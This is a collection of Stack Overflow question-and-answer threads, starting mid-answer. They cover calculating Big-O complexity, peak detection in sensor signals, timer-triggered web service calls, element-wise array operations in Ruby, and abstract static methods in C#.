var n = text.length;
for (var i = 0; i < n; i++) {
f(text.slice(0, n-1))
}
// ... other JS logic here, which we can ignore ...
}
Big Oh of above is f(n) = O(n!) where n represents number of items in input set,
and f represents operation done per item.
Big-Oh notation is the asymptotic upper-bound of the complexity of an algorithm.
In programming: The assumed worst-case time taken,
or assumed maximum repeat count of logic, for size of the input.
Calculation
Keep in mind (from above meaning) that; We just need worst-case time and/or maximum repeat count affected by N (size of input),
Then take another look at (accepted answer's) example:
for (i = 0; i < 2*n; i += 2) { // line 123
for (j=n; j > i; j--) { // line 124
foo(); // line 125
}
}
*
*Begin with this search-pattern:
*
*Find first line that N caused repeat behavior,
*Or caused increase of logic executed,
*But constant or not, ignore anything before that line.
*Seems line hundred-twenty-three is what we are searching ;-)
*
*On first sight, line seems to have 2*n max-looping.
*But looking again, we see i += 2 (and that half is skipped).
*So, max repeat is simply n, write it down, like f(n) = O( n but don't close parenthesis yet.
*Repeat search till method's end, and find next line matching our search-pattern, here that's line 124
*
*Which is tricky, because strange condition, and reverse looping.
*But after remembering that we just need to consider maximum repeat count (or worst-case time taken).
*It's as easy as saying "Reverse-Loop j starts with j=n, am I right? yes, n seems to be maximum possible repeat count", so:
*
*Add n to previous write down's end,
*but like "( n " instead of "+ n" (as this is inside previous loop),
*and close parenthesis only if we find something outside of previous loop.
Search Done! why? because line 125 (or any other line after) does not match our search-pattern.
We can now close any parenthesis (left-open in our write down), resulting in below:
f(n) = O( n( n ) )
Try to further shorten "n( n )" part, like:
*
*n( n ) = n * n
*= n2
*Finally, just wrap it with Big Oh notation, like O(n2) or O(n^2) without formatting.
A: Seeing the answers here I think we can conclude that most of us do indeed approximate the order of the algorithm by looking at it and use common sense instead of calculating it with, for example, the master method as we were thought at university.
With that said I must add that even the professor encouraged us (later on) to actually think about it instead of just calculating it.
Also I would like to add how it is done for recursive functions:
suppose we have a function like (scheme code):
(define (fac n)
(if (= n 0)
1
(* n (fac (- n 1)))))
which recursively calculates the factorial of the given number.
The first step is to try and determine the performance characteristic for the body of the function only in this case, nothing special is done in the body, just a multiplication (or the return of the value 1).
So the performance for the body is: O(1) (constant).
Next try and determine this for the number of recursive calls. In this case we have n-1 recursive calls.
So the performance for the recursive calls is: O(n-1) (order is n, as we throw away the insignificant parts).
Then put those two together and you then have the performance for the whole recursive function:
1 * (n-1) = O(n)
Peter, to answer your raised issues; the method I describe here actually handles this quite well. But keep in mind that this is still an approximation and not a full mathematically correct answer. The method described here is also one of the methods we were taught at university, and if I remember correctly was used for far more advanced algorithms than the factorial I used in this example.
Of course it all depends on how well you can estimate the running time of the body of the function and the number of recursive calls, but that is just as true for the other methods.
A: What often gets overlooked is the expected behavior of your algorithms. It doesn't change the Big-O of your algorithm, but it does relate to the statement "premature optimization. . .."
Expected behavior of your algorithm is -- very dumbed down -- how fast you can expect your algorithm to work on data you're most likely to see.
For instance, if you're searching for a value in a list, it's O(n), but if you know that most lists you see have your value up front, typical behavior of your algorithm is faster.
To really nail it down, you need to be able to describe the probability distribution of your "input space" (if you need to sort a list, how often is that list already going to be sorted? how often is it totally reversed? how often is it mostly sorted?) It's not always feasible that you know that, but sometimes you do.
A: great question!
Disclaimer: this answer contains false statements see the comments below.
If you're using the Big O, you're talking about the worse case (more on what that means later). Additionally, there is capital theta for average case and a big omega for best case.
Check out this site for a lovely formal definition of Big O: https://xlinux.nist.gov/dads/HTML/bigOnotation.html
f(n) = O(g(n)) means there are positive constants c and k, such that 0 ≤ f(n) ≤ cg(n) for all n ≥ k. The values of c and k must be fixed for the function f and must not depend on n.
Ok, so now what do we mean by "best-case" and "worst-case" complexities?
This is probably most clearly illustrated through examples. For example if we are using linear search to find a number in a sorted array then the worst case is when we decide to search for the last element of the array as this would take as many steps as there are items in the array. The best case would be when we search for the first element since we would be done after the first check.
The point of all these adjective-case complexities is that we're looking for a way to graph the amount of time a hypothetical program runs to completion in terms of the size of particular variables. However for many algorithms you can argue that there is not a single time for a particular size of input. Notice that this contradicts with the fundamental requirement of a function, any input should have no more than one output. So we come up with multiple functions to describe an algorithm's complexity. Now, even though searching an array of size n may take varying amounts of time depending on what you're looking for in the array and depending proportionally to n, we can create an informative description of the algorithm using best-case, average-case, and worst-case classes.
Sorry this is so poorly written and lacks much technical information. But hopefully it'll make time complexity classes easier to think about. Once you become comfortable with these it becomes a simple matter of parsing through your program and looking for things like for-loops that depend on array sizes and reasoning based on your data structures what kind of input would result in trivial cases and what input would result in worst-cases.
A: If your cost is a polynomial, just keep the highest-order term, without its multiplier. E.g.:
O((n/2 + 1)*(n/2)) = O(n2/4 + n/2) = O(n2/4) = O(n2)
This doesn't work for infinite series, mind you. There is no single recipe for the general case, though for some common cases, the following inequalities apply:
O(log N) < O(N) < O(N log N) < O(N2) < O(Nk) < O(en) < O(n!)
A: I think about it in terms of information. Any problem consists of learning a certain number of bits.
Your basic tool is the concept of decision points and their entropy. The entropy of a decision point is the average information it will give you. For example, if a program contains a decision point with two branches, it's entropy is the sum of the probability of each branch times the log2 of the inverse probability of that branch. That's how much you learn by executing that decision.
For example, an if statement having two branches, both equally likely, has an entropy of 1/2 * log(2/1) + 1/2 * log(2/1) = 1/2 * 1 + 1/2 * 1 = 1. So its entropy is 1 bit.
Suppose you are searching a table of N items, like N=1024. That is a 10-bit problem because log(1024) = 10 bits. So if you can search it with IF statements that have equally likely outcomes, it should take 10 decisions.
That's what you get with binary search.
Suppose you are doing linear search. You look at the first element and ask if it's the one you want. The probabilities are 1/1024 that it is, and 1023/1024 that it isn't. The entropy of that decision is 1/1024*log(1024/1) + 1023/1024 * log(1024/1023) = 1/1024 * 10 + 1023/1024 * about 0 = about .01 bit. You've learned very little! The second decision isn't much better. That is why linear search is so slow. In fact it's exponential in the number of bits you need to learn.
Suppose you are doing indexing. Suppose the table is pre-sorted into a lot of bins, and you use some of all of the bits in the key to index directly to the table entry. If there are 1024 bins, the entropy is 1/1024 * log(1024) + 1/1024 * log(1024) + ... for all 1024 possible outcomes. This is 1/1024 * 10 times 1024 outcomes, or 10 bits of entropy for that one indexing operation. That is why indexing search is fast.
Now think about sorting. You have N items, and you have a list. For each item, you have to search for where the item goes in the list, and then add it to the list. So sorting takes roughly N times the number of steps of the underlying search.
So sorts based on binary decisions having roughly equally likely outcomes all take about O(N log N) steps. An O(N) sort algorithm is possible if it is based on indexing search.
I've found that nearly all algorithmic performance issues can be looked at in this way.
A: Lets start from the beginning.
First of all, accept the principle that certain simple operations on data can be done in O(1) time, that is, in time that is independent of the size of the input. These primitive operations in C consist of
*
*Arithmetic operations (e.g. + or %).
*Logical operations (e.g., &&).
*Comparison operations (e.g., <=).
*Structure accessing operations (e.g. array-indexing like A[i], or pointer fol-
lowing with the -> operator).
*Simple assignment such as copying a value into a variable.
*Calls to library functions (e.g., scanf, printf).
The justification for this principle requires a detailed study of the machine instructions (primitive steps) of a typical computer. Each of the described operations can be done with some small number of machine instructions; often only one or two instructions are needed.
As a consequence, several kinds of statements in C can be executed in O(1) time, that is, in some constant amount of time independent of input. These simple include
*
*Assignment statements that do not involve function calls in their expressions.
*Read statements.
*Write statements that do not require function calls to evaluate arguments.
*The jump statements break, continue, goto, and return expression, where
expression does not contain a function call.
In C, many for-loops are formed by initializing an index variable to some value and
incrementing that variable by 1 each time around the loop. The for-loop ends when
the index reaches some limit. For instance, the for-loop
for (i = 0; i < n-1; i++)
{
small = i;
for (j = i+1; j < n; j++)
if (A[j] < A[small])
small = j;
temp = A[small];
A[small] = A[i];
A[i] = temp;
}
uses index variable i. It increments i by 1 each time around the loop, and the iterations
stop when i reaches n − 1.
However, for the moment, focus on the simple form of for-loop, where the difference between the final and initial values, divided by the amount by which the index variable is incremented tells us how many times we go around the loop. That count is exact, unless there are ways to exit the loop via a jump statement; it is an upper bound on the number of iterations in any case.
For instance, the for-loop iterates ((n − 1) − 0)/1 = n − 1 times,
since 0 is the initial value of i, n − 1 is the highest value reached by i (i.e., when i
reaches n−1, the loop stops and no iteration occurs with i = n−1), and 1 is added
to i at each iteration of the loop.
In the simplest case, where the time spent in the loop body is the same for each
iteration, we can multiply the big-oh upper bound for the body by the number of
times around the loop. Strictly speaking, we must then add O(1) time to initialize
the loop index and O(1) time for the first comparison of the loop index with the
limit, because we test one more time than we go around the loop. However, unless
it is possible to execute the loop zero times, the time to initialize the loop and test
the limit once is a low-order term that can be dropped by the summation rule.
Now consider this example:
(1) for (j = 0; j < n; j++)
(2) A[i][j] = 0;
We know that line (1) takes O(1) time. Clearly, we go around the loop n times, as
we can determine by subtracting the lower limit from the upper limit found on line
(1) and then adding 1. Since the body, line (2), takes O(1) time, we can neglect the
time to increment j and the time to compare j with n, both of which are also O(1).
Thus, the running time of lines (1) and (2) is the product of n and O(1), which is O(n).
Similarly, we can bound the running time of the outer loop consisting of lines
(2) through (4), which is
(2) for (i = 0; i < n; i++)
(3) for (j = 0; j < n; j++)
(4) A[i][j] = 0;
We have already established that the loop of lines (3) and (4) takes O(n) time.
Thus, we can neglect the O(1) time to increment i and to test whether i < n in
each iteration, concluding that each iteration of the outer loop takes O(n) time.
The initialization i = 0 of the outer loop and the (n + 1)st test of the condition
i < n likewise take O(1) time and can be neglected. Finally, we observe that we go
around the outer loop n times, taking O(n) time for each iteration, giving a total
O(n^2) running time.
A more practical example.
A: Big O gives the upper bound for time complexity of an algorithm. It is usually used in conjunction with processing data sets (lists) but can be used elsewhere.
A few examples of how it's used in C code.
Say we have an array of n elements
int array[n];
If we wanted to access the first element of the array this would be O(1) since it doesn't matter how big the array is, it always takes the same constant time to get the first item.
x = array[0];
If we wanted to find a number in the list:
for(int i = 0; i < n; i++){
if(array[i] == numToFind){ return i; }
}
This would be O(n) since at most we would have to look through the entire list to find our number. The Big-O is still O(n) even though we might find our number the first try and run through the loop once because Big-O describes the upper bound for an algorithm (omega is for lower bound and theta is for tight bound).
When we get to nested loops:
for(int i = 0; i < n; i++){
for(int j = i; j < n; j++){
array[j] += 2;
}
}
This is O(n^2) since for each pass of the outer loop ( O(n) ) we have to go through the entire list again so the n's multiply leaving us with n squared.
This is barely scratching the surface but when you get to analyzing more complex algorithms complex math involving proofs comes into play. Hope this familiarizes you with the basics at least though.
A: For code A, the outer loop will execute for n+1 times, the '1' time means the process which checks the whether i still meets the requirement. And inner loop runs n times, n-2 times.... Thus,0+2+..+(n-2)+n= (0+n)(n+1)/2= O(n²).
For code B, though inner loop wouldn't step in and execute the foo(), the inner loop will be executed for n times depend on outer loop execution time, which is O(n)
A: I don't know how to programmatically solve this, but the first thing people do is that we sample the algorithm for certain patterns in the number of operations done, say 4n^2 + 2n + 1 we have 2 rules:
*
*If we have a sum of terms, the term with the largest growth rate is kept, with other terms omitted.
*If we have a product of several factors constant factors are omitted.
If we simplify f(x), where f(x) is the formula for number of operations done, (4n^2 + 2n + 1 explained above), we obtain the big-O value [O(n^2) in this case]. But this would have to account for Lagrange interpolation in the program, which may be hard to implement. And what if the real big-O value was O(2^n), and we might have something like O(x^n), so this algorithm probably wouldn't be programmable. But if someone proves me wrong, give me the code . . . .
A: If you want to estimate the order of your code empirically rather than by analyzing the code, you could stick in a series of increasing values of n and time your code. Plot your timings on a log scale. If the code is O(x^n), the values should fall on a line of slope n.
This has several advantages over just studying the code. For one thing, you can see whether you're in the range where the run time approaches its asymptotic order. Also, you may find that some code that you thought was order O(x) is really order O(x^2), for example, because of time spent in library calls.
A: I'll do my best to explain it here on simple terms, but be warned that this topic takes my students a couple of months to finally grasp. You can find more information on the Chapter 2 of the Data Structures and Algorithms in Java book.
There is no mechanical procedure that can be used to get the BigOh.
As a "cookbook", to obtain the BigOh from a piece of code you first need to realize that you are creating a math formula to count how many steps of computations get executed given an input of some size.
The purpose is simple: to compare algorithms from a theoretical point of view, without the need to execute the code. The lesser the number of steps, the faster the algorithm.
For example, let's say you have this piece of code:
int sum(int* data, int N) {
int result = 0; // 1
for (int i = 0; i < N; i++) { // 2
result += data[i]; // 3
}
return result; // 4
}
This function returns the sum of all the elements of the array, and we want to create a formula to count the computational complexity of that function:
Number_Of_Steps = f(N)
So we have f(N), a function to count the number of computational steps. The input of the function is the size of the structure to process. It means that this function is called such as:
Number_Of_Steps = f(data.length)
The parameter N takes the data.length value. Now we need the actual definition of the function f(). This is done from the source code, in which each interesting line is numbered from 1 to 4.
There are many ways to calculate the BigOh. From this point forward we are going to assume that every sentence that doesn't depend on the size of the input data takes a constant C number computational steps.
We are going to add the individual number of steps of the function, and neither the local variable declaration nor the return statement depends on the size of the data array.
That means that lines 1 and 4 takes C amount of steps each, and the function is somewhat like this:
f(N) = C + ??? + C
The next part is to define the value of the for statement. Remember that we are counting the number of computational steps, meaning that the body of the for statement gets executed N times. That's the same as adding C, N times:
f(N) = C + (C + C + ... + C) + C = C + N * C + C
There is no mechanical rule to count how many times the body of the for gets executed, you need to count it by looking at what does the code do. To simplify the calculations, we are ignoring the variable initialization, condition and increment parts of the for statement.
To get the actual BigOh we need the Asymptotic analysis of the function. This is roughly done like this:
*
*Take away all the constants C.
*From f() get the polynomium in its standard form.
*Divide the terms of the polynomium and sort them by the rate of growth.
*Keep the one that grows bigger when N approaches infinity.
Our f() has two terms:
f(N) = 2 * C * N ^ 0 + 1 * C * N ^ 1
Taking away all the C constants and redundant parts:
f(N) = 1 + N ^ 1
Since the last term is the one which grows bigger when f() approaches infinity (think on limits) this is the BigOh argument, and the sum() function has a BigOh of:
O(N)
There are a few tricks to solve some tricky ones: use summations whenever you can.
As an example, this code can be easily solved using summations:
for (i = 0; i < 2*n; i += 2) { // 1
for (j=n; j > i; j--) { // 2
foo(); // 3
}
}
The first thing you needed to be asked is the order of execution of foo(). While the usual is to be O(1), you need to ask your professors about it. O(1) means (almost, mostly) constant C, independent of the size N.
The for statement on the sentence number one is tricky. While the index ends at 2 * N, the increment is done by two. That means that the first for gets executed only N steps, and we need to divide the count by two.
f(N) = Summation(i from 1 to 2 * N / 2)( ... ) =
= Summation(i from 1 to N)( ... )
The sentence number two is even trickier since it depends on the value of i. Take a look: the index i takes the values: 0, 2, 4, 6, 8, ..., 2 * N, and the second for get executed: N times the first one, N - 2 the second, N - 4 the third... up to the N / 2 stage, on which the second for never gets executed.
On formula, that means:
f(N) = Summation(i from 1 to N)( Summation(j = ???)( ) )
Again, we are counting the number of steps. And by definition, every summation should always start at one, and end at a number bigger-or-equal than one.
f(N) = Summation(i from 1 to N)( Summation(j = 1 to (N - (i - 1) * 2)( C ) )
(We are assuming that foo() is O(1) and takes C steps.)
We have a problem here: when i takes the value N / 2 + 1 upwards, the inner Summation ends at a negative number! That's impossible and wrong. We need to split the summation in two, being the pivotal point the moment i takes N / 2 + 1.
f(N) = Summation(i from 1 to N / 2)( Summation(j = 1 to (N - (i - 1) * 2)) * ( C ) ) + Summation(i from 1 to N / 2) * ( C )
Since the pivotal moment i > N / 2, the inner for won't get executed, and we are assuming a constant C execution complexity on its body.
Now the summations can be simplified using some identity rules:
*
*Summation(w from 1 to N)( C ) = N * C
*Summation(w from 1 to N)( A (+/-) B ) = Summation(w from 1 to N)( A ) (+/-) Summation(w from 1 to N)( B )
*Summation(w from 1 to N)( w * C ) = C * Summation(w from 1 to N)( w ) (C is a constant, independent of w)
*Summation(w from 1 to N)( w ) = (N * (N + 1)) / 2
Applying some algebra:
f(N) = Summation(i from 1 to N / 2)( (N - (i - 1) * 2) * ( C ) ) + (N / 2)( C )
f(N) = C * Summation(i from 1 to N / 2)( (N - (i - 1) * 2)) + (N / 2)( C )
f(N) = C * (Summation(i from 1 to N / 2)( N ) - Summation(i from 1 to N / 2)( (i - 1) * 2)) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - 2 * Summation(i from 1 to N / 2)( i - 1 )) + (N / 2)( C )
=> Summation(i from 1 to N / 2)( i - 1 ) = Summation(i from 1 to N / 2 - 1)( i )
f(N) = C * (( N ^ 2 / 2 ) - 2 * Summation(i from 1 to N / 2 - 1)( i )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - 2 * ( (N / 2 - 1) * (N / 2 - 1 + 1) / 2) ) + (N / 2)( C )
=> (N / 2 - 1) * (N / 2 - 1 + 1) / 2 =
(N / 2 - 1) * (N / 2) / 2 =
((N ^ 2 / 4) - (N / 2)) / 2 =
(N ^ 2 / 8) - (N / 4)
f(N) = C * (( N ^ 2 / 2 ) - 2 * ( (N ^ 2 / 8) - (N / 4) )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - ( (N ^ 2 / 4) - (N / 2) )) + (N / 2)( C )
f(N) = C * (( N ^ 2 / 2 ) - (N ^ 2 / 4) + (N / 2)) + (N / 2)( C )
f(N) = C * ( N ^ 2 / 4 ) + C * (N / 2) + C * (N / 2)
f(N) = C * ( N ^ 2 / 4 ) + 2 * C * (N / 2)
f(N) = C * ( N ^ 2 / 4 ) + C * N
f(N) = C * 1/4 * N ^ 2 + C * N
And the BigOh is:
O(N²)
A: Basically the thing that crops up 90% of the time is just analyzing loops. Do you have single, double, triple nested loops? The you have O(n), O(n^2), O(n^3) running time.
Very rarely (unless you are writing a platform with an extensive base library (like for instance, the .NET BCL, or C++'s STL) you will encounter anything that is more difficult than just looking at your loops (for statements, while, goto, etc...)
A: While knowing how to figure out the Big O time for your particular problem is useful, knowing some general cases can go a long way in helping you make decisions in your algorithm.
Here are some of the most common cases, lifted from http://en.wikipedia.org/wiki/Big_O_notation#Orders_of_common_functions:
O(1) - Determining if a number is even or odd; using a constant-size lookup table or hash table
O(logn) - Finding an item in a sorted array with a binary search
O(n) - Finding an item in an unsorted list; adding two n-digit numbers
O(n2) - Multiplying two n-digit numbers by a simple algorithm; adding two n×n matrices; bubble sort or insertion sort
O(n3) - Multiplying two n×n matrices by simple algorithm
O(cn) - Finding the (exact) solution to the traveling salesman problem using dynamic programming; determining if two logical statements are equivalent using brute force
O(n!) - Solving the traveling salesman problem via brute-force search
O(nn) - Often used instead of O(n!) to derive simpler formulas for asymptotic complexity
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3255",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "970"
} |
Q: Peak detection of measured signal We use a data acquisition card to take readings from a device that increases its signal to a peak and then falls back to near the original value. To find the peak value we currently search the array for the highest reading and use the index to determine the timing of the peak value which is used in our calculations.
This works well if the highest value is the peak we are looking for but if the device is not working correctly we can see a second peak which can be higher than the initial peak. We take 10 readings a second from 16 devices over a 90 second period.
My initial thoughts are to cycle through the readings checking to see if the previous and next points are less than the current to find a peak and construct an array of peaks. Maybe we should be looking at a average of a number of points either side of the current position to allow for noise in the system. Is this the best way to proceed or are there better techniques?
We do use LabVIEW and I have checked the LAVA forums and there are a number of interesting examples. This is part of our test software and we are trying to avoid using too many non-standard VI libraries so I was hoping for feedback on the process/algorithms involved rather than specific code.
A: There are lots and lots of classic peak detection methods, any of which might work. You'll have to see what, in particular, bounds the quality of your data. Here are basic descriptions:
*
*Between any two points in your data, (x(0), y(0)) and (x(n), y(n)), add up y(i + 1) - y(i) for 0 <= i < n and call this T ("travel") and set R ("rise") to y(n) - y(0) + k for suitably small k. T/R > 1 indicates a peak. This works OK if large travel due to noise is unlikely or if noise distributes symmetrically around a base curve shape. For your application, accept the earliest peak with a score above a given threshold, or analyze the curve of travel per rise values for more interesting properties.
*Use matched filters to score similarity to a standard peak shape (essentially, use a normalized dot-product against some shape to get a cosine-metric of similarity)
*Deconvolve against a standard peak shape and check for high values (though I often find 2 to be less sensitive to noise for simple instrumentation output).
*Smooth the data and check for triplets of equally spaced points where, if x0 < x1 < x2, y1 > 0.5 * (y0 + y2), or check Euclidean distances like this: D((x0, y0), (x1, y1)) + D((x1, y1), (x2, y2)) > D((x0, y0),(x2, y2)), which relies on the triangle inequality. Using simple ratios will again provide you a scoring mechanism.
*Fit a very simple 2-gaussian mixture model to your data (for example, Numerical Recipes has a nice ready-made chunk of code). Take the earlier peak. This will deal correctly with overlapping peaks.
*Find the best match in the data to a simple Gaussian, Cauchy, Poisson, or what-have-you curve. Evaluate this curve over a broad range and subtract it from a copy of the data after noting it's peak location. Repeat. Take the earliest peak whose model parameters (standard deviation probably, but some applications might care about kurtosis or other features) meet some criterion. Watch out for artifacts left behind when peaks are subtracted from the data.
Best match might be determined by the kind of match scoring suggested in #2 above.
I've done what you're doing before: finding peaks in DNA sequence data, finding peaks in derivatives estimated from measured curves, and finding peaks in histograms.
I encourage you to attend carefully to proper baselining. Wiener filtering or other filtering or simple histogram analysis is often an easy way to baseline in the presence of noise.
Finally, if your data is typically noisy and you're getting data off the card as unreferenced single-ended output (or even referenced, just not differential), and if you're averaging lots of observations into each data point, try sorting those observations and throwing away the first and last quartile and averaging what remains. There are a host of such outlier elimination tactics that can be really useful.
A: I would like to contribute to this thread an algorithm that I have developed myself:
It is based on the principle of dispersion: if a new datapoint is a given x number of standard deviations away from some moving mean, the algorithm signals (also called z-score). The algorithm is very robust because it constructs a separate moving mean and deviation, such that signals do not corrupt the threshold. Future signals are therefore identified with approximately the same accuracy, regardless of the amount of previous signals. The algorithm takes 3 inputs: lag = the lag of the moving window, threshold = the z-score at which the algorithm signals and influence = the influence (between 0 and 1) of new signals on the mean and standard deviation. For example, a lag of 5 will use the last 5 observations to smooth the data. A threshold of 3.5 will signal if a datapoint is 3.5 standard deviations away from the moving mean. And an influence of 0.5 gives signals half of the influence that normal datapoints have. Likewise, an influence of 0 ignores signals completely for recalculating the new threshold: an influence of 0 is therefore the most robust option.
It works as follows:
Pseudocode
# Let y be a vector of timeseries data of at least length lag+2
# Let mean() be a function that calculates the mean
# Let std() be a function that calculates the standard deviaton
# Let absolute() be the absolute value function
# Settings (the ones below are examples: choose what is best for your data)
set lag to 5; # lag 5 for the smoothing functions
set threshold to 3.5; # 3.5 standard deviations for signal
set influence to 0.5; # between 0 and 1, where 1 is normal influence, 0.5 is half
# Initialise variables
set signals to vector 0,...,0 of length of y; # Initialise signal results
set filteredY to y(1,...,lag) # Initialise filtered series
set avgFilter to null; # Initialise average filter
set stdFilter to null; # Initialise std. filter
set avgFilter(lag) to mean(y(1,...,lag)); # Initialise first value
set stdFilter(lag) to std(y(1,...,lag)); # Initialise first value
for i=lag+1,...,t do
if absolute(y(i) - avgFilter(i-1)) > threshold*stdFilter(i-1) then
if y(i) > avgFilter(i-1)
set signals(i) to +1; # Positive signal
else
set signals(i) to -1; # Negative signal
end
# Adjust the filters
set filteredY(i) to influence*y(i) + (1-influence)*filteredY(i-1);
set avgFilter(i) to mean(filteredY(i-lag,i),lag);
set stdFilter(i) to std(filteredY(i-lag,i),lag);
else
set signals(i) to 0; # No signal
# Adjust the filters
set filteredY(i) to y(i);
set avgFilter(i) to mean(filteredY(i-lag,i),lag);
set stdFilter(i) to std(filteredY(i-lag,i),lag);
end
end
Demo
> For more information, see original answer
A: This problem has been studied in some detail.
There are a set of very up-to-date implementations in the TSpectrum* classes of ROOT (a nuclear/particle physics analysis tool). The code works in one- to three-dimensional data.
The ROOT source code is available, so you can grab this implementation if you want.
From the TSpectrum class documentation:
The algorithms used in this class have been published in the following references:
[1] M.Morhac et al.: Background
elimination methods for
multidimensional coincidence gamma-ray
spectra. Nuclear Instruments and
Methods in Physics Research A 401
(1997) 113-
132.
[2] M.Morhac et al.: Efficient one- and two-dimensional Gold
deconvolution and its application to
gamma-ray spectra decomposition.
Nuclear Instruments and Methods in
Physics Research A 401 (1997) 385-408.
[3] M.Morhac et al.: Identification of peaks in
multidimensional coincidence gamma-ray
spectra. Nuclear Instruments and
Methods in Research Physics A
443(2000), 108-125.
The papers are linked from the class documentation for those of you who don't have a NIM online subscription.
The short version of what is done is that the histogram flattened to eliminate noise, and then local maxima are detected by brute force in the flattened histogram.
A: This method is basically from David Marr's book "Vision"
Gaussian blur your signal with the expected width of your peaks.
this gets rid of noise spikes and your phase data is undamaged.
Then edge detect (LOG will do)
Then your edges were the edges of features (like peaks).
look between edges for peaks, sort peaks by size, and you're done.
I have used variations on this and they work very well.
A: I think you want to cross-correlate your signal with an expected, exemplar signal. But, it has been such a long time since I studied signal processing and even then I didn't take much notice.
A: You could try signal averaging, i.e. for each point, average the value with the surrounding 3 or more points. If the noise blips are huge, then even this may not help.
I realise that this was language agnostic, but guessing that you are using LabView, there are lots of pre-packaged signal processing VIs that come with LabView that you can use to do smoothing and noise reduction. The NI forums are a great place to get more specialised help on this sort of thing.
A: You could apply some Standard Deviation to your logic and take notice of peaks over x%.
A: I don't know very much about instrumentation, so this might be totally impractical, but then again it might be a helpful different direction. If you know how the readings can fail, and there is a certain interval between peaks given such failures, why not do gradient descent at each interval. If the descent brings you back to an area you've searched before, you can abandon it. Depending upon the shape of the sampled surface, this also might help you find peaks faster than search.
A: Is there a qualitative difference between the desired peak and the unwanted second peak? If both peaks are "sharp" -- i.e. short in time duration -- when looking at the signal in the frequency domain (by doing FFT) you'll get energy at most bands. But if the "good" peak reliably has energy present at frequencies not existing in the "bad" peak, or vice versa, you may be able to automatically differentiate them that way.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3260",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "59"
} |
Q: Timer-based event triggers I am currently working on a project with specific requirements. A brief overview of these are as follows:
*
*Data is retrieved from external webservices
*Data is stored in SQL 2005
*Data is manipulated via a web GUI
*The windows service that communicates with the web services has no coupling with our internal web UI, except via the database.
*Communication with the web services needs to be both time-based, and triggered via user intervention on the web UI.
The current (pre-pre-production) model for web service communication triggering is via a database table that stores trigger requests generated from the manual intervention. I do not really want to have multiple trigger mechanisms, but would like to be able to populate the database table with triggers based upon the time of the call. As I see it there are two ways to accomplish this.
1) Adapt the trigger table to store two extra parameters. One being "Is this time-based or manually added?" and a nullable field to store the timing details (exact format to be determined). If it is a manaully created trigger, mark it as processed when the trigger has been fired, but not if it is a timed trigger.
or
2) Create a second windows service that creates the triggers on-the-fly at timed intervals.
The second option seems like a fudge to me, but the management of option 1 could easily turn into a programming nightmare (how do you know if the last poll of the table returned the event that needs to fire, and how do you then stop it re-triggering on the next poll)
I'd appreciate it if anyone could spare a few minutes to help me decide which route (one of these two, or possibly a third, unlisted one) to take.
A: Why not use a SQL Job instead of the Windows Service? You can encapsulate all of you db "trigger" code in Stored Procedures. Then your UI and SQL Job can call the same Stored Procedures and create the triggers the same way whether it's manually or at a time interval.
A: The way I see it is this.
You have a Windows Service, which is playing the role of a scheduler and in it there are some classes which simply call the webservices and put the data in your databases.
So, you can use these classes directly from the WebUI as well and import the data based on the WebUI trigger.
I don't like the idea of storing a user generated action as a flag (trigger) in the database where some service will poll it (at an interval which is not under the user's control) to execute that action.
You could even convert the whole code into an exe which you can then schedule using the Windows Scheduler. And call the same exe whenever the user triggers the action from the Web UI.
A: @Vaibhav
Unfortunately, the physical architecture of the solution will not allow any direct communication between the components, other than Web UI to Database, and database to service (which can then call out to the web services). I do, however, agree that re-use of the communication classes would be the ideal here - I just can't do it within the confines of our business*
*Isn't it always the way that a technically "better" solution is stymied by external factors?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3272",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: Mapping values from two array in Ruby I'm wondering if there's a way to do what I can do below with Python, in Ruby:
sum = reduce(lambda x, y: x + y, map(lambda x, y: x * y, weights, data))
I have two arrays of equal sizes with the weights and data but I can't seem to find a function similar to map in Ruby, reduce I have working.
A: In Ruby 1.9:
weights.zip(data).map{|a,b| a*b}.reduce(:+)
In Ruby 1.8:
weights.zip(data).inject(0) {|sum,(w,d)| sum + w*d }
A: The Array.zip function does an elementwise combination of arrays. It's not quite as clean as the Python syntax, but here's one approach you could use:
weights = [1, 2, 3]
data = [4, 5, 6]
result = Array.new
a.zip(b) { |x, y| result << x * y } # For just the one operation
sum = 0
a.zip(b) { |x, y| sum += x * y } # For both operations
A: @Michiel de Mare
Your Ruby 1.9 example can be shortened a bit further:
weights.zip(data).map(:*).reduce(:+)
Also note that in Ruby 1.8, if you require ActiveSupport (from Rails) you can use:
weights.zip(data).map(&:*).reduce(&:+)
A: Ruby has a map method (a.k.a. the collect method), which can be applied to any Enumerable object. If numbers is an array of numbers, the following line in Ruby:
numbers.map{|x| x + 5}
is the equivalent of the following line in Python:
map(lambda x: x + 5, numbers)
For more details, see here or here.
A: An alternative for the map that works for more than 2 arrays as well:
def dot(*arrays)
arrays.transpose.map {|vals| yield vals}
end
dot(weights,data) {|a,b| a*b}
# OR, if you have a third array
dot(weights,data,offsets) {|a,b,c| (a*b)+c}
This could also be added to Array:
class Array
def dot
self.transpose.map{|vals| yield vals}
end
end
[weights,data].dot {|a,b| a*b}
#OR
[weights,data,offsets].dot {|a,b,c| (a*b)+c}
A: weights = [1,2,3]
data = [10,50,30]
require 'matrix'
Vector[*weights].inner_product Vector[*data] # => 200
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3281",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Why can't I have abstract static methods in C#? I've been working with providers a fair bit lately, and I came across an interesting situation where I wanted to have an abstract class that had an abstract static method. I read a few posts on the topic, and it sort of made sense, but is there a nice clear explanation?
A: To add to the previous explanations, static method calls are bound to a specific method at compile-time, which rather rules out polymorphic behavior.
A: We actually override static methods (in delphi), it's a bit ugly, but it works just fine for our needs.
We use it so the classes can have a list of their available objects without the class instance, for example, we have a method that looks like this:
class function AvailableObjects: string; override;
begin
Result := 'Object1, Object2';
end;
It's ugly but necessary, this way we can instantiate just what is needed, instead of having all the classes instantianted just to search for the available objects.
This was a simple example, but the application itself is a client-server application which has all the classes available in just one server, and multiple different clients which might not need everything the server has and will never need an object instance.
So this is much easier to maintain than having one different server application for each client.
Hope the example was clear.
